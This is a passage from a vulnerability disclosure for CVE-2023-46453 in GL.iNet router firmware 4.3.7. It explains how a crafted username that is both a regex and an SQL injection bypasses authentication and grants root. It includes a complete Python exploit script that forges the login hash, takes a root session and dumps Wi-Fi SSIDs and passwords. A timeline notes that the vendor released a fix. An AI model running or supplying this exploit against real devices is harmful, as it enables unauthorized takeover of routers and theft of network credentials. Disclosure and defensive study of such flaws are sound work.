This will cause the script to skip the password and return the<br />user id instead.<br /><br />Since the user id of the root user is always 0, the script will always<br />compute:<br /><br />md5("root:[^:]+:[^:]+" + ":" + "0" + ":" + nonce)<br /><br />Since every input to this value is now known to the attacker, the attacker can simply<br />compute the hash value and send it to the login rpc endpoint to gain access to the web interface.<br /><br />However, this approach alone won't work as expected, since later in the code<br />this check appears:<br /><br />------------------------------------------------------------------------<br /> local aclgroup = db.get_acl_by_username(username)<br /><br /> local sid = utils.generate_id(32)<br /><br /> sessions[sid] = {<br /> username = username,<br /> aclgroup = aclgroup,<br /> timeout = time_now() + session_timeout<br /> }<br />------------------------------------------------------------------------<br /><br />The username, which is now our custom regex, will be passed to the<br />get_acl_by_username function. 
This function will check the username against a database and<br />return the aclgroup associated with the username.<br />If the username is not found in the database the function will return an empty aclgroup,<br />thus causing the attack to fail.<br /><br />By checking the code we can see that the get_acl_by_username function is<br />actually interpolating our raw string into a query with string.format and then executing it.<br />This means that we can inject SQL into the username field and<br />make it return a valid aclgroup.<br /><br />------------------------------------------------------------------------<br />M.get_acl_by_username = function(username)<br /> if username == "root" then return "root" end<br /><br /> local db = sqlite3.open(DB)<br /> local sql = string.format("SELECT acl FROM account WHERE username =<br />'%s'", username)<br /><br /> local aclgroup = ""<br /><br /> for a in db:rows(sql) do<br /> aclgroup = a[1]<br /> end<br /><br /> db:close()<br /><br /> return aclgroup<br />end<br />------------------------------------------------------------------------<br /><br />Using this approach we were able to craft a username which is both a valid<br />regex and a working SQL injection:<br /><br />roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+<br /><br />This will make the SQL query become:<br /><br />SELECT acl FROM account WHERE username = 'roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+'<br /><br />which will return the aclgroup of the root user (root), since char(114,111,111,116)<br />evaluates to the string root and the rest of the line is commented out.<br /><br />========================================================================<br />3. 
Exploit<br />========================================================================<br /><br />------------------------------------------------------------------------<br /># Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass<br /># Date: 18/10/2023<br /># Exploit Author: Daniele 'dzonerzy' Linguaglossa<br /># Vendor Homepage: https://www.gl-inet.com/<br /># Vulnerable Devices:<br /># GL.iNet GL-MT3000 (4.3.7)<br /># GL.iNet GL-AR300M(4.3.7)<br /># GL.iNet GL-B1300 (4.3.7)<br /># GL.iNet GL-AX1800 (4.3.7)<br /># GL.iNet GL-AR750S (4.3.7)<br /># GL.iNet GL-MT2500 (4.3.7)<br /># GL.iNet GL-AXT1800 (4.3.7)<br /># GL.iNet GL-X3000 (4.3.7)<br /># GL.iNet GL-SFT1200 (4.3.7)<br /># And many more...<br /># Version: 4.3.7<br /># Firmware Release Date: 2023/09/13<br /># CVE: CVE-2023-46453<br /><br />from urllib.parse import urlparse<br />import requests<br />import hashlib<br />import random<br />import sys<br /><br /><br />def exploit(url):<br /> try:<br /> requests.packages.urllib3.disable_warnings()<br /> host = urlparse(url)<br /> url = f"{host.scheme}://{host.netloc}/rpc"<br /> print(f"[*] Target: {url}")<br /> print("[*] Retrieving nonce...")<br /> nonce = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "challenge",<br /> "params": {"username": "root"}<br /> }, timeout=5).json()<br /> if "result" in nonce and "nonce" in nonce["result"]:<br /> print(f"[*] Got nonce: {nonce['result']['nonce']} !")<br /> else:<br /> print("[!] Nonce not found, exiting... 
:(")<br /> sys.exit(1)<br /> print("[*] Retrieving authentication token for root...")<br /> md5_hash = hashlib.md5()<br /> md5_hash.update(<br /> f"roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())<br /> password = md5_hash.hexdigest()<br /> token = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "login",<br /> "params": {<br /> "username": f"roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+",<br /> "hash": password<br /> }<br /> }, timeout=5).json()<br /> if "result" in token and "sid" in token["result"]:<br /> print(f"[*] Got token: {token['result']['sid']} !")<br /> else:<br /> print("[!] Token not found, exiting... :(")<br /> sys.exit(1)<br /> print("[*] Checking if we are root...")<br /> check = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "call",<br /> "params": [token["result"]["sid"], "system", "get_status", {}]<br /> }, timeout=5).json()<br /> if "result" in check and "wifi" in check["result"]:<br /> print("[*] We are authenticated as root! :)")<br /> print("[*] Below some info:")<br /> for wifi in check["result"]["wifi"]:<br /> print(f"[*] --------------------")<br /> print(f"[*] SSID: {wifi['ssid']}")<br /> print(f"[*] Password: {wifi['passwd']}")<br /> print(f"[*] Band: {wifi['band']}")<br /> print(f"[*] --------------------")<br /> else:<br /> print("[!] Something went wrong, exiting... :(")<br /> sys.exit(1)<br /> except requests.exceptions.Timeout:<br /> print("[!] Timeout error, exiting... :(")<br /> sys.exit(1)<br /> except KeyboardInterrupt:<br /> print(f"[!] 
Something went wrong: {e}")<br /><br /><br />if __name__ == "__main__":<br /> print("GL.iNet Auth Bypass\n")<br /> if len(sys.argv) < 2:<br /> print(<br /> f"Usage: python3 {sys.argv[1]} https://target.com",<br />file=sys.stderr)<br /> sys.exit(0)<br /> else:<br /> exploit(sys.argv[1])<br />------------------------------------------------------------------------<br /><br />========================================================================<br />4. Timeline<br />========================================================================<br /><br />2023/09/13 - Vulnerability discovered<br />2023/09/14 - CVE-2023-46453 requested<br />2023/09/20 - Vendor contacted<br />2023/09/20 - Vendor replied<br />2023/09/30 - CVE-2023-46453 assigned<br />2023/11/08 - Vulnerability patched and fix released<br /><br /></code></pre>